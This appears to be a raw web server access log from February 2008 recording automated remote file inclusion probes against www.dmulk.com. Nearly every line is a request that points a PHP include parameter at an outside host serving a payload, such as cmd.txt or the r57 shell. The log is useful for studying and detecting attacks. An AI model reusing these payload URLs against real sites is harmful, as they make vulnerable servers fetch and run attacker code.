121.173.130.137 - - [21/Feb/2008:11:22:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:22:10 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:22:34 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:11:22:41 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:11:22:41 -0800] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:23:09 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:11:23:13 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:23:17 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:11:23:21 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:23:30 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:23:31 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:23:31 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:23:32 -0800] "GET /logs/access_080108.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:23:33 -0800] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:24:01 -0800] "GET /logs/access_080108.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:24:01 -0800] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:03 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:03 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:03 -0800] "GET /?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:03 -0800] "GET /?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:04 -0800] "GET /logs/?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 200 36279 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:04 -0800] "GET /logs/?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 200 36279 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:12 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.117.180 - - [21/Feb/2008:11:24:18 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt??%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:24:32 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [21/Feb/2008:11:24:37 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [21/Feb/2008:11:24:37 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [21/Feb/2008:11:24:38 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:24:40 -0800] "GET /mcf.php?content=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:24:40 -0800] "GET /logs/mcf.php?content=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:11:24:41 -0800] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:11:24:42 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:24:49 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:25:54 -0800] "GET /mcf.php?content=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:25:54 -0800] "GET /logs/mcf.php?content=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
80.66.66.217 - - [21/Feb/2008:11:26:14 -0800] "GET /logs/ws/get_reminders.php?noSet=0&includedir=http://www.stempel-immobilien.de/images/mambo?? HTTP/1.0" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
80.66.66.217 - - [21/Feb/2008:11:26:14 -0800] "GET /ws/get_reminders.php?noSet=0&includedir=http://www.stempel-immobilien.de/images/mambo?? HTTP/1.0" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:26:57 -0800] "GET /logs/access_080117.log//init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:26:57 -0800] "GET /logs/access_080117.log//init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:26:57 -0800] "GET //init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:26:57 -0800] "GET //init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:26:58 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:26:58 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:27:00 -0800] "GET //init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:27:00 -0800] "GET //init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:27:01 -0800] "GET /logs/access_080117.log//init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:27:01 -0800] "GET //init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:27:01 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [21/Feb/2008:11:27:04 -0800] "GET //init_basic.php?GALLERY_BASEDIR=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:27:19 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:27:19 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:11:27:50 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:28:23 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:28:23 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:28:56 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.249.0.39 - - [21/Feb/2008:11:29:09 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:11:29:12 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:11:29:12 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:29:55 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:29:55 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:29:55 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:30:01 -0800] "GET /logs/access_080118.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.46.247 - - [21/Feb/2008:11:30:42 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:11:30:47 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:11:30:47 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.30.179 - - [21/Feb/2008:11:30:50 -0800] "GET /logs/access.log/index1.php?id=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.30.179 - - [21/Feb/2008:11:30:50 -0800] "GET /index1.php?id=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.30.179 - - [21/Feb/2008:11:30:50 -0800] "GET /logs/index1.php?id=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.46.247 - - [21/Feb/2008:11:30:52 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:31:14 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:31:15 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:31:23 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:31:23 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:31:23 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.21.223.90 - - [21/Feb/2008:11:31:26 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rpgnet.com/newrpgnet/intranet/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [21/Feb/2008:11:31:30 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rpgnet.com/newrpgnet/intranet/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:31:32 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:11:31:43 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.148.20.146 - - [21/Feb/2008:11:31:47 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [21/Feb/2008:11:31:47 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [21/Feb/2008:11:31:48 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:32:44 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.155.86.251 - - [21/Feb/2008:11:33:13 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:33:13 -0800] "GET /logs/access_080108.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:33:13 -0800] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.155.86.251 - - [21/Feb/2008:11:33:14 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [21/Feb/2008:11:33:14 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:33:18 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
201.155.86.251 - - [21/Feb/2008:11:33:18 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:33:19 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:33:19 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:33:24 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:33:24 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:33:24 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [21/Feb/2008:11:33:27 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:33:41 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:34:15 -0800] "GET /logs/access_080126.log//modules/My_eGallery/public/displayCategory.php?basepath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:34:16 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:34:16 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:34:21 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:34:21 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:34:22 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [21/Feb/2008:11:34:38 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
210.148.20.146 - - [21/Feb/2008:11:34:41 -0800] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:35:26 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:35:26 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:35:27 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:35:28 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.254.85 - - [21/Feb/2008:11:35:58 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [21/Feb/2008:11:35:58 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:11:35:59 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:11:36:00 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.254.85 - - [21/Feb/2008:11:36:03 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:36:07 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:36:08 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [21/Feb/2008:11:36:08 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [21/Feb/2008:11:36:09 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-p